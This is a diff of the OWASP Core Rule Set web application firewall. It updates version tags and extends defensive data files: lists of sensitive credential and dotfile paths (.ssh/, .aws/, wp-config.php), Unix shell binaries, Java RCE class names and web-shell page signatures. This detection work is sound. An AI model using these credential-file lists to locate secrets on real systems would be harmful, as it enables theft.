 # -= Reporting Level 2 =- (Skip over reporting when tx.reporting_level is less than 2)
-SecRule TX:REPORTING_LEVEL "@lt 2" "id:980046,phase:5,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REPORTING"
+SecRule TX:REPORTING_LEVEL "@lt 2" "id:980046,phase:5,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REPORTING"
 
 # -= Detection score exceeds threshold =- (Jump to reporting rule immediately if a detection score exceeds a threshold)
-SecRule TX:DETECTION_INBOUND_ANOMALY_SCORE "@ge %{tx.inbound_anomaly_score_threshold}" "id:980047,phase:5,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:LOG-REPORTING"
-SecRule TX:DETECTION_OUTBOUND_ANOMALY_SCORE "@ge %{tx.outbound_anomaly_score_threshold}" "id:980048,phase:5,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:LOG-REPORTING"
+SecRule TX:DETECTION_INBOUND_ANOMALY_SCORE "@ge %{tx.inbound_anomaly_score_threshold}" "id:980047,phase:5,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:LOG-REPORTING"
+SecRule TX:DETECTION_OUTBOUND_ANOMALY_SCORE "@ge %{tx.outbound_anomaly_score_threshold}" "id:980048,phase:5,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:LOG-REPORTING"
 
 # -= Reporting Level 3 =- (Skip over reporting when tx.reporting_level is less than 3)
-SecRule TX:REPORTING_LEVEL "@lt 3" "id:980049,phase:5,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REPORTING"
+SecRule TX:REPORTING_LEVEL "@lt 3" "id:980049,phase:5,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REPORTING"
 
 # -= Blocking score greater than zero =- (Jump to reporting rule immediately when sum of inbound and outbound blocking score is greater than zero)
-SecRule TX:BLOCKING_ANOMALY_SCORE "@gt 0" "id:980050,phase:5,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:LOG-REPORTING"
+SecRule TX:BLOCKING_ANOMALY_SCORE "@gt 0" "id:980050,phase:5,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:LOG-REPORTING"
 
 # -= Reporting Level 4 =- (Skip over reporting when tx.reporting_level is less than 4)
-SecRule TX:REPORTING_LEVEL "@lt 4" "id:980051,phase:5,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-REPORTING"
+SecRule TX:REPORTING_LEVEL "@lt 4" "id:980051,phase:5,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-REPORTING"
 
 # At this point, the reporting level is 4 and there's a non-zero detection
 # score (already established by rule 980043) so fall through to the reporting
@@ -95,37 +95,37 @@ SecAction \
 (SQLI=%{tx.sql_injection_score}, XSS=%{tx.xss_score}, RFI=%{tx.rfi_score}, LFI=%{tx.lfi_score}, RCE=%{tx.rce_score}, PHPI=%{tx.php_injection_score}, HTTP=%{tx.http_violation_score}, SESS=%{tx.session_fixation_score}, COMBINED_SCORE=%{tx.anomaly_score})',\
     tag:'reporting',\
     tag:'OWASP_CRS',\
-    ver:'OWASP_CRS/4.6.0'"
+    ver:'OWASP_CRS/4.15.0-dev'"
 
 SecMarker "END-REPORTING"
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:980011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-980-CORRELATION"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:980012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-980-CORRELATION"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:980011,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-980-CORRELATION"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 1" "id:980012,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-980-CORRELATION"
 #
 # -= Paranoia Level 1 (default) =- (apply only when tx.detection_paranoia_level is sufficiently high: 1 or higher)
 #
 
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:980013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-980-CORRELATION"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:980014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-980-CORRELATION"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:980013,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-980-CORRELATION"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 2" "id:980014,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-980-CORRELATION"
 #
 # -= Paranoia Level 2 =- (apply only when tx.detection_paranoia_level is sufficiently high: 2 or higher)
 #
 
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:980015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-980-CORRELATION"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:980016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-980-CORRELATION"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:980015,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-980-CORRELATION"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 3" "id:980016,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-980-CORRELATION"
 #
 # -= Paranoia Level 3 =- (apply only when tx.detection_paranoia_level is sufficiently high: 3 or higher)
 #
 
 
 
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:980017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-980-CORRELATION"
-SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:980018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.6.0',skipAfter:END-RESPONSE-980-CORRELATION"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:980017,phase:1,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-980-CORRELATION"
+SecRule TX:DETECTION_PARANOIA_LEVEL "@lt 4" "id:980018,phase:2,pass,nolog,tag:'OWASP_CRS',ver:'OWASP_CRS/4.15.0-dev',skipAfter:END-RESPONSE-980-CORRELATION"
 #
 # -= Paranoia Level 4 =- (apply only when tx.detection_paranoia_level is sufficiently high: 4 or higher)
 #
diff --git a/rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example b/rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example
index 94b461bd7..a82afe5eb 100644
--- a/rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example
+++ b/rules/RESPONSE-999-EXCLUSION-RULES-AFTER-CRS.conf.example
@@ -1,7 +1,7 @@
 # ------------------------------------------------------------------------
-# OWASP CRS ver.4.6.0
+# OWASP CRS ver.4.15.0-dev
 # Copyright (c) 2006-2020 Trustwave and contributors. All rights reserved.
-# Copyright (c) 2021-2024 CRS project. All rights reserved.
+# Copyright (c) 2021-2025 CRS project. All rights reserved.
 #
 # The OWASP CRS is distributed under
 # Apache Software License (ASL) version 2
diff --git a/rules/java-classes.data b/rules/java-classes.data
index f936a915d..4bb13784b 100644
--- a/rules/java-classes.data
+++ b/rules/java-classes.data
@@ -1,5 +1,5 @@
 # Java Classes for use with Java RCEs
-# 
+#
 # Used With Rule 944130 in Apache Struts and Oracle Weblogic RCEs Detection:
 #
 # CVE-2017-5638  (2017.01.29) https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638
@@ -34,6 +34,7 @@ java.io.InputStream
 java.io.InputStreamReader
 java.io.IOException
 java.io.LineNumberReader
+java.io.ObjectInputStream
 java.io.ObjectOutputStream
 java.io.OutputStream
 java.io.PipedOutputStream
@@ -53,12 +54,22 @@ java.lang.Runtime
 java.lang.String
 java.lang.StringBuilder
 java.lang.System
+java.net.HttpURLConnection
+java.net.ServerSocket
 java.net.Socket
+java.net.URL
 javassist
+javax.naming.InitialContext
 javax.script.ScriptEngineManager
+javax.xml.parsers
+javax.xml.stream
 org.apache.commons
 org.apache.struts
 org.apache.struts2
+org.dom4j.io.SAXReader
+org.jdom2.input.SAXBuilder
 org.omg.CORBA
+org.xml.sax
 java.beans.XMLDecode
+java.nio.file
 sun.reflect
diff --git a/rules/java-code-leakages.data b/rules/java-code-leakages.data
deleted file mode 100644
index 5ec620588..000000000
--- a/rules/java-code-leakages.data
+++ /dev/null
@@ -1,17 +0,0 @@
-<jsp:
-javax.servlet
-.addheader
-.createtextfile
-.getfile
-.loadfromfile
-response.binarywrite
-response.write
-scripting.filesystemobject
-server.createobject
-server.execute
-server.htmlencode
-server.mappath
-server.urlencode
-vbscript.encode
-wscript.network
-wscript.shell
diff --git a/rules/lfi-os-files.data b/rules/lfi-os-files.data
index 86449c384..8b24aa554 100644
--- a/rules/lfi-os-files.data
+++ b/rules/lfi-os-files.data
@@ -31,18 +31,28 @@
 .cshrc
 .cups/
 .dbus/
-.docker
+.docker/
 .drush/
-.env
+# .env
+.envrc
 .eslintignore
 .fbcindex
 .forward
 .gem/
+.git/
 .gitattributes
 .gitconfig
-.gnonme/
+.gitignore
+.gitkeep
+.gitmodules
+.gnome/
+.gnome2/
+.gnomerc/
 .gnupg/
+.google_authenticator
 .gsutil/
+.hg/
+.hgignore
 .hplip/hplip.conf
 .htaccess
 .htdigest
@@ -64,6 +74,7 @@
 .netrc
 .node_repl_history
 .npm/
+.npmrc
 .nsconfig
 .nsr
 .nvm/
@@ -82,22 +93,33 @@
 .rediscli_history
 .rhistory
 .rhosts
+.selected_editor
 .sh_history
 .sqlite_history
+.snap/
 .ssh/
 .subversion/
+.svn/
+.svnignore
 .tconn/
 .tcshrc
+.tmux.conf
 .thunderbird/
 .tor/
+.travis.yaml
+.travis.yml
+.vagrant.d/
 .vidalia/
 .vim/
 .viminfo
 .vimrc
+.vscode
 .vmware/
 .www_acl
 .wwwacl
 .xauthority
+.yarnrc
+.zshenv
 .zhistory
 .zsh_history
 .zshrc
@@ -106,6 +128,44 @@
 /php.ini
 /tmp/
 
+# Compressed database dumps
+.sql.001
+.sql.7z
+.sql.bz
+.sql.ace
+.sql.arj
+.sql.cpio
+.sql.gz
+.sql.lha
+.sql.lz
+.sql.pa
+.sql.pea
+.sql.r00
+.sql.r01
+.sql.r02
+.sql.r03
+.sql.r04
+.sql.r05
+.sql.r06
+.sql.r07
+.sql.r08
+.sql.r09
+.sql.rar
+.sql.rev
+.sql.tar
+.sql.taz
+.sql.tbz
+.sql.tgz
+.sql.txz
+.sql.uha
+.sql.xz
+.sql.yz1
+.sql.z
+# AWS cli
+aws.yaml
+aws.yml
+aws-key.yaml
+aws-key.yml
 # Apache httpd entries can be generated with the following command:
 # curl -s https://raw.githubusercontent.com/lightos/Panoptic/master/cases.xml | grep "file value" | cut -d'"' -f2 | awk -F/ '{ { if (length($NF) > 0) {v1 = NF-1; v2 = NF} else {v1 = NF-2; v2 = NF-1} print tolower($v1"/"$v2) }) }' | grep apache | sort | uniq
 apache/access.conf
@@ -153,6 +213,8 @@ config/custom.php
 config/database.php
 configuration.php
 cpanel/logs
+database.yaml
+database.yml
 data/elasticsearch
 data/kafka
 defaults.inc.php
diff --git a/rules/php-function-names-933150.data b/rules/php-function-names-933150.data
index 057a69027..593e6a382 100644
--- a/rules/php-function-names-933150.data
+++ b/rules/php-function-names-933150.data
@@ -41,8 +41,6 @@ fclose
 file_exists
 file_get_contents
 finfo_open
-fopen
-fputs
 fsockopen
 ftp_connect
 ftp_get
@@ -125,7 +123,6 @@ mb_eregi_replace
 mb_parse_str
 md5_file
 method_exists
-mkdir
 move_uploaded_file
 mysql_query
 number_format
@@ -186,7 +183,6 @@ readgzfile
 register_shutdown_function
 register_tick_function
 rename_function
-rtrim
 runkit_constant_add
 runkit_constant_redefine
 runkit_function_add
@@ -225,7 +221,6 @@ sqlite_unbuffered_query
 str_replace
 stream_context_create
 stream_socket_client
-strip_tags
 stripcslashes
 stripslashes
 strlen
@@ -240,6 +235,5 @@ uksort
 unserialize
 urldecode
 urlencode
-usort
 var_dump
 zlib_decode
diff --git a/rules/restricted-files.data b/rules/restricted-files.data
index 04919fc7c..b8a9c129b 100644
--- a/rules/restricted-files.data
+++ b/rules/restricted-files.data
@@ -3,32 +3,52 @@
 .htaccess
 .htdigest
 .htpasswd
-# home level dotfiles (keep in sync with lfi-os-files.data)
-# grep -E '^\.' lfi-os-files.data
+# home level dotfiles (keep in sync with lfi-os-files.data).
+# Also include commented values (e.g., `# .env`), but not comments.
+# grep -E "^(#\s*)?\.\S+$" lfi-os-files.data | sed 's/^#\s*//'
 .addressbook
+.anydesk/
 .aptitude/config
+.atom/
 .aws/
 .azure/
 .bash_
 .bashrc
+.boto
 .cache/notify-osd.log
 .config/
 .cshrc
-.docker
+.cups/
+.dbus/
+.docker/
 .drush/
 .env
+.envrc
 .eslintignore
 .fbcindex
 .forward
+.gem/
+.git/
 .gitattributes
 .gitconfig
+.gitignore
+.gitkeep
+.gitmodules
+.gnome/
+.gnome2/
+.gnomerc/
 .gnupg/
 .google_authenticator
+.gsutil/
+.hg/
+.hgignore
 .hplip/hplip.conf
 .htaccess
 .htdigest
 .htpasswd
+.java/
 .ksh_history
+.kube/
 .lesshst
 .lftp/
 .lhistory
@@ -36,13 +56,17 @@
 .lldb-history
 .local/share/mc/
 .lynx_cookies
+.minikube/
 .my.cnf
 .mysql_history
 .nano_history
+.netrc
 .node_repl_history
+.npm/
 .npmrc
 .nsconfig
 .nsr
+.nvm/
 .oh-my-
 .password-store
 .pearrc
@@ -64,33 +88,73 @@
 .snap/
 .ssh/
 .subversion/
+.svn/
+.svnignore
 .tconn/
 .tcshrc
 .tmux.conf
+.thunderbird/
 .tor/
+.travis.yaml
+.travis.yml
 .vagrant.d/
 .vidalia/
 .vim/
 .viminfo
 .vimrc
 .vscode
+.vmware/
 .www_acl
 .wwwacl
-.Xauthority
+.xauthority
 .yarnrc
+.zshenv
 .zhistory
 .zsh_history
-.zshenv
 .zshrc
-# Version control
-/.git/
-/.gitignore
-/.hg/
-/.hgignore
-/.svn/
+
+# Compressed database dumps
+.sql.001
+.sql.7z
+.sql.bz
+.sql.ace
+.sql.arj
+.sql.cpio
+.sql.gz
+.sql.lha
+.sql.lz
+.sql.pa
+.sql.pea
+.sql.r00
+.sql.r01
+.sql.r02
+.sql.r03
+.sql.r04
+.sql.r05
+.sql.r06
+.sql.r07
+.sql.r08
+.sql.r09
+.sql.rar
+.sql.rev
+.sql.tar
+.sql.taz
+.sql.tbz
+.sql.tgz
+.sql.txz
+.sql.uha
+.sql.xz
+.sql.yz1
+.sql.z
+# AWS cli
+aws.yaml
+aws.yml
+aws-key.yaml
+aws-key.yml
 # October CMS credentials file
 /auth.json
 # Wordpress
+wp-config.copy
 wp-config.php
 wp-config.bak
 wp-config.old
@@ -148,6 +212,7 @@ bower.json
 .jshintrc
 .gitlab-ci.yml
 .travis.yml
+database.yaml
 database.yml
 Dockerfile
 # PHP_CodeSniffer configuration files
@@ -180,6 +245,25 @@ BlockCypher.log
 config.inc.php
 config.sample.php
 defaults.inc.php
+# Contains credentials for SendGrid service
+sendgrid.env
+# Fish shell files
+.fish
+fish_variables
+# CVE-2023-5003
+ldap-authentication-report.csv
+# OpenStack-Ansible credentials file
+user_secrets.yml
+# File used by Visual Studio to store sensitive data
+secrets.json
+# Docker definition files, first two are commented out
+# as they are matched by the rest of the files
+#docker-compose.yml
+#docker-compose.yaml
+compose.yml
+compose.yaml
+# cloud-init definition file
+cloud-config.yml
 
 # /proc entries (keep in sync with lfi-os-files.data)
 # grep -E "^proc/" lfi-os-files.data
diff --git a/rules/restricted-upload.data b/rules/restricted-upload.data
index fd5850e6b..b3a3d920d 100644
--- a/rules/restricted-upload.data
+++ b/rules/restricted-upload.data
@@ -5,29 +5,35 @@
 # w
 # q
 # EOF
-# words="$(awk ' !/^#/ {split($0, segments, "/")} {word = segments[length(segments)]} length(word) > 3 {print word}' rules/restricted-files.data | \
-#   sort | uniq)"
+# words="$(awk ' !/^#/ && NF {
+#  n = split($0, segments, "/");
+#  word = segments[n];
+#  if (length(word) > 3) print word
+# }' rules/restricted-files.data | sort | uniq)"
 # while read -r word; do
 #   if [ "$(util/fp-finder/spell.sh -m -e - <<<"${word}")" != "${word}" ]; then
 #     echo "${word}" >> rules/restricted-upload.data
 #   fi
 # done <<<"${words}"
-
-.DS_Store
 .addressbook
 .bash_
 .bashrc
+.boto
 .bowerrc
 .cshrc
-.docker
+.DS_Store
 .env
+.envrc
 .eslintignore
 .eslintrc
 .fbcindex
+.fish
 .forward
 .gitattributes
 .gitconfig
 .gitignore
+.gitkeep
+.gitmodules
 .gitlab-ci.yml
 .google_authenticator
 .hgignore
@@ -45,7 +51,9 @@
 .my.cnf
 .mysql_history
 .nano_history
+.netrc
 .node_repl_history
+.npmrc
 .nsconfig
 .nsr
 .oh-my-
@@ -65,50 +73,65 @@
 .rediscli_history
 .rhistory
 .rhosts
+.selected_editor
 .sh_history
 .sqlite_history
+.svnignore
 .tcshrc
+.tmux.conf
+.travis.yaml
 .travis.yml
 .user.ini
 .viminfo
 .vimrc
+.vscode
 .ws_ftp.ini
 .www_acl
 .wwwacl
 .xauthority
+.yarnrc
 .zhistory
 .zsh_history
+.zshenv
 .zshrc
-Desktop.ini
-Dockerfile
-Thumbs.db
-Web.config
 acpi
 asound
 auth.json
+aws.yaml
+aws.yml
+aws-key.yaml
+aws-key.yml
+BlockCypher.log
 bootconfig
 bower.json
 buddyinfo
 cgroups
+cloud-config.yml
 cmdline
+compose.yaml
+compose.yml
 composer.json
 composer.lock
+config_dev.yml
+config_prod.yml
+config_test.yml
 config.gz
 config.inc.php
 config.php
 config.sample.php
 config.yml
-config_dev.yml
-config_prod.yml
-config_test.yml
 cpuinfo
+database.yaml
 database.yml
-defaults.inc.php
 default.settings.php
+defaults.inc.php
+Desktop.ini
 diskstats
+Dockerfile
 dynamic_debug
 execdomains
 filesystems
+fish_variables
 gruntfile.js
 hplip.conf
 hypervisor
@@ -123,6 +146,7 @@ kpagecgroup
 kpagecount
 kpageflags
 latency_stats
+ldap-authentication-report.csv
 loadavg
 local.xml
 mdstat
@@ -138,15 +162,17 @@ packages.json
 pagetypeinfo
 parameters.php
 parameters.yml
-php.ini
 php_error.log
 php_errors.log
+php.ini
 phpcs.xml
 phpcs.xml.dist
 routing.yml
 sched_debug
 schedstat
+secrets.json
 security.yml
+sendgrid.env
 services.yml
 settings.inc.php
 settings.local.php
@@ -159,14 +185,18 @@ sslvpn_websession
 sysrq-trigger
 sysvipc
 thread-self
+Thumbs.db
 timer_list
 timer_stats
 tsconfig.json
+user_secrets.yml
 version_signature
 vmallocinfo
 vmstat
+Web.config
 weblogic.xml
 webpack.config.js
+wp-config.copy
 wp-config.bak
 wp-config.old
 wp-config.php
diff --git a/rules/unix-shell.data b/rules/unix-shell.data
index fb6b7f476..c06d8dace 100644
--- a/rules/unix-shell.data
+++ b/rules/unix-shell.data
@@ -51,6 +51,8 @@ bin/ar
 bin/arch
 bin/aria2c
 bin/arj
+bin/arjdisp
+bin/arj-register
 bin/arp
 bin/as
 bin/ascii-xfr
@@ -95,7 +97,9 @@ bin/bzless
 bin/bzmore
 bin/bzz
 bin/c89
+bin/c89-gcc
 bin/c99
+bin/c99-gcc
 bin/cancel
 bin/capsh
 bin/cat
@@ -111,6 +115,7 @@ bin/check_raid
 bin/check_ssl_cert
 bin/check_statusfile
 bin/chef
+bin/chef-
 bin/chflags
 bin/chgrp
 bin/chmod
@@ -124,6 +129,7 @@ bin/clang
 bin/clang++
 bin/cmp
 bin/cobc
+bin/cobcrun
 bin/column
 bin/comm
 bin/command
@@ -165,6 +171,7 @@ bin/docker
 bin/done
 bin/dosbox
 bin/dpkg
+bin/dpkg-
 bin/du
 bin/dvips
 bin/e2fsck
@@ -193,6 +200,10 @@ bin/export
 bin/expr
 bin/facter
 bin/fc
+bin/fdfind
+bin/fdisk
+bin/fdmount
+bin/fdumount
 bin/fetch
 bin/fg
 bin/fgrep
@@ -207,6 +218,7 @@ bin/fmt
 bin/fold
 bin/foreach
 bin/fping
+bin/fping6
 bin/ftp
 bin/ftpstats
 bin/ftpwho
@@ -223,13 +235,16 @@ bin/HEAD
 bin/POST
 bin/getfacl
 bin/ghc
+bin/ghc-
 bin/ghci
+bin/ghci-
 bin/gimp
 bin/ginsh
 bin/git
 bin/go
 bin/gpg
 bin/grc
+bin/grcat
 bin/grep
 bin/groupmod
 bin/gtester
@@ -259,6 +274,9 @@ bin/ionice
 bin/ip
 bin/ip6tables
 bin/ipconfig
+bin/ippeveprinter
+bin/ippfind
+bin/ipptool
 bin/iptables
 bin/irb
 bin/ispell
@@ -400,6 +418,9 @@ bin/paste
 bin/patch
 bin/pax
 bin/pdb
+bin/pdb2mb
+bin/pdb3
+bin/pdb3.
 bin/pdflatex
 bin/pdftex
 bin/pdksh
@@ -457,6 +478,7 @@ bin/rc
 bin/rcp
 bin/readelf
 bin/realpath
+bin/reboot
 bin/red
 bin/redcarpet
 bin/rename
@@ -476,6 +498,7 @@ bin/rpmdb
 bin/rpmquery
 bin/rpmverify
 bin/rsync
+bin/rsync-ssl
 bin/ruby
 bin/run-mailcap
 bin/run-parts
@@ -522,7 +545,21 @@ bin/strace
 bin/strings
 bin/su
 bin/sudo
+bin/sudoedit
+bin/sudoreplay
+bin/sudo_
 bin/svn
+bin/svnadmin
+bin/svnauthz
+bin/svnbench
+bin/svndumpfilter
+bin/svnfsfs
+bin/svnlook
+bin/svnmucc
+bin/svnrdump
+bin/svnserve
+bin/svnsync
+bin/svnversion
 bin/sysctl
 bin/systemctl
 bin/systemd-resolve
diff --git a/rules/web-shells-asp.data b/rules/web-shells-asp.data
new file mode 100644
index 000000000..28faa8906
--- /dev/null
+++ b/rules/web-shells-asp.data
@@ -0,0 +1,23 @@
+# This list contains patterns of various web shells, backdoors and similar
+# software written in ASP language. There is no way how to automatically update
+# this list, so it must be done by hand. Here is a recommended way how to add
+# new malicious software:
+# 1.) As patterns are matched against RESPONSE_BODY, you need to run a malicious
+#     software (ideally in an isolated environment) and catch the output.
+# 2.) In the output, search for static pattern unique enough to match only
+#     the software in question and to not do any FPs. The best pick is usually
+#     a part of HTML code with software name.
+# 3.) Include software name and URL (if available) in the comment above
+#     the pattern.
+#
+# Data comes from multiple places of which some doesn't work anymore. Few are
+# listed below:
+# - https://www.localroot.net/
+# - Google search (keywords like webshells, asp backdoor and similar)
+
+# Akmal archtte id ASPX shell
+<title>Webshell Akmal archtte id</title>
+# ASPYDrv shell
+<html><title>ASPYDrvsInfo</title>
+# RHTOOLS shell
+<html><head><title>RHTOOLS
diff --git a/rules/web-shells-php.data b/rules/web-shells-php.data
index 72eaecb44..8ac7c3961 100644
--- a/rules/web-shells-php.data
+++ b/rules/web-shells-php.data
@@ -66,6 +66,8 @@ color=DeepSkyBlue   size=6>    ## ex0 shell
 <p align="center" class="style4">FaTaLSheLL v
 # G-Security Webshell
 <title>G-Security Webshell</title>
+# Gecko web shell
+<title>Gecko [
 # h4ntu shell web shell
 <title>h4ntu shell [powered by tsoi]</title>
 # IDBTEAM SHELLS file manager
@@ -137,6 +139,8 @@ PHPShell by MAX666, Private Exploit, For Server Hacking
 <font face="Wingdings 3" size="5">y</font><b>StresBypass<span lang="en-us">v
 # SyRiAn Sh3ll web shell
 <title>SyRiAn Sh3ll ~
+# Tiny File Manager
+<title>Tiny File Manager</title>
 # Turk Shell web shell
 <head><title>Wardom | Ne Mutlu T
 # Unknown web shell
diff --git a/tests/docker-compose.yml b/tests/docker-compose.yml
index f870e8a03..1df248b82 100644
--- a/tests/docker-compose.yml
+++ b/tests/docker-compose.yml
@@ -1,34 +1,50 @@
 # Only one of these will be up at a time for now.
 # Concurrency will be on the tests folder we have.
 
+x-common-env: &common-env
+  ARG_LENGTH: 400
+  TOTAL_ARG_LENGTH: 6400
+  BACKEND: http://backend
+  BLOCKING_PARANOIA: 4
+  COMBINED_FILE_SIZES: "65535"
+  CRS_ENABLE_TEST_MARKER: 1
+  MAX_FILE_SIZE: "64100"
+  MODSEC_AUDIT_LOG_FORMAT: Native
+  MODSEC_AUDIT_LOG_TYPE: Serial
+  MODSEC_RESP_BODY_ACCESS: "On"
+  MODSEC_RESP_BODY_MIMETYPE: "text/plain text/html text/xml application/json"
+  MODSEC_RULE_ENGINE: DetectionOnly
+  MODSEC_TMP_DIR: "/tmp"
+  PORT: "8080"
+  VALIDATE_UTF8_ENCODING: 1
+
+x-apache-env: &apache-env
+  <<: *common-env
+  ACCESSLOG: "/var/log/apache2/access.log"
+  ERRORLOG: "/var/log/apache2/error.log"
+  MODSEC_AUDIT_LOG: "/var/log/apache2/modsec_audit.log"
+  SERVERNAME: modsec2-apache
+
+x-nginx-env: &nginx-env
+  <<: *common-env
+  ACCESSLOG: "/var/log/nginx/access.log"
+  ERRORLOG: "/var/log/nginx/error.log"
+  LOGLEVEL: "info"
+  MODSEC_AUDIT_LOG: "/var/log/nginx/modsec_audit.log"
+  SERVERNAME: modsec3-nginx
+
 services:
-  modsec2-apache:
+  modsec2-apache: &apache
     container_name: modsec2-apache
-    image: owasp/modsecurity-crs:apache@sha256:36fc67d66f7761a6cb532c4855901a41792efa6e58303833c03aeed285c9c961 # pin v4.3.0
+    image: owasp/modsecurity-crs:apache@sha256:0e9b787a9828a419f305a1d28b3030f06d89cff100856d588487656d8714b201
+
     # NOTE: The user used to run the container process is explicitly set to
     # 'root'. This fixes issues with permissions on the logging directories used
     # as bind mounts. This is done as *a convenience for running the CRS testing
     # setup only* and *should not be done in general!*
     user: root
     environment:
-      ACCESSLOG: "/var/log/apache2/access.log"
-      BACKEND: http://backend
-      BLOCKING_PARANOIA: 4
-      COMBINED_FILE_SIZES: "65535"
-      CRS_ENABLE_TEST_MARKER: 1
-      ERRORLOG: "/var/log/apache2/error.log"
-      MAX_FILE_SIZE: "64100"
-      MODSEC_AUDIT_LOG_FORMAT: Native
-      MODSEC_AUDIT_LOG_TYPE: Serial
-      MODSEC_AUDIT_LOG: "/var/log/apache2/modsec_audit.log"
-      MODSEC_RESP_BODY_ACCESS: "On"
-      MODSEC_RESP_BODY_MIMETYPE: "text/plain text/html text/xml application/json"
-      MODSEC_RULE_ENGINE: DetectionOnly
-      MODSEC_TMP_DIR: "/tmp"
-      PORT: "8080"
-      SERVERNAME: modsec2-apache
-      VALIDATE_UTF8_ENCODING: 1
-      ARG_LENGTH: 400
+      <<: *apache-env
     volumes:
       - ./logs/modsec2-apache:/var/log/apache2:rw
       - ../rules:/opt/owasp-crs/rules:ro
@@ -40,34 +56,24 @@ services:
     depends_on:
       - backend
 
+  modsec2-apache-debug:
+    <<: *apache
+    container_name: modsec2-apache-debug
+    environment:
+      <<: *apache-env
+      MODSEC_DEBUG_LOG: "/var/log/apache2/modsec_debug.log"
+      MODSEC_DEBUG_LOGLEVEL: 9
 
-  modsec3-nginx:
+  modsec3-nginx: &nginx
     container_name: modsec3-nginx
-    image: owasp/modsecurity-crs:nginx@sha256:44b6e45fdc9eb9fdd34bb62f91f51513a87116e1445222cff7f4018bed7d42eb # pin v4.3.0
+    image: owasp/modsecurity-crs:nginx@sha256:244f4ade623ec61bc602458d937f8865663af6161a7e0fefd82603de13571a8d
     # NOTE: The user used to run the container process is explicitly set to
     # 'root'. This fixes issues with permissions on the logging directories used
     # as bind mounts. This is done as *a convenience for running the CRS testing
     # setup only* and *should not be done in general!*
     user: root
     environment:
-      ACCESSLOG: "/var/log/nginx/access.log"
-      BACKEND: http://backend
-      BLOCKING_PARANOIA: 4
-      COMBINED_FILE_SIZES: "65535"
-      CRS_ENABLE_TEST_MARKER: 1
-      ERRORLOG: "/var/log/nginx/error.log"
-      LOGLEVEL: "info"
-      MAX_FILE_SIZE: "64100"
-      MODSEC_AUDIT_LOG_FORMAT: Native
-      MODSEC_AUDIT_LOG_TYPE: Serial
-      MODSEC_AUDIT_LOG: "/var/log/nginx/modsec_audit.log"
-      MODSEC_RESP_BODY_ACCESS: "On"
-      MODSEC_RESP_BODY_MIMETYPE: "text/plain text/html text/xml application/json"
-      MODSEC_RULE_ENGINE: DetectionOnly
-      PORT: "8080"
-      SERVERNAME: modsec3-nginx
-      VALIDATE_UTF8_ENCODING: 1
-      ARG_LENGTH: 400
+      <<: *nginx-env
     volumes:
       - ./logs/modsec3-nginx:/var/log/nginx:rw
       - ../rules:/opt/owasp-crs/rules:ro
@@ -79,6 +85,15 @@ services:
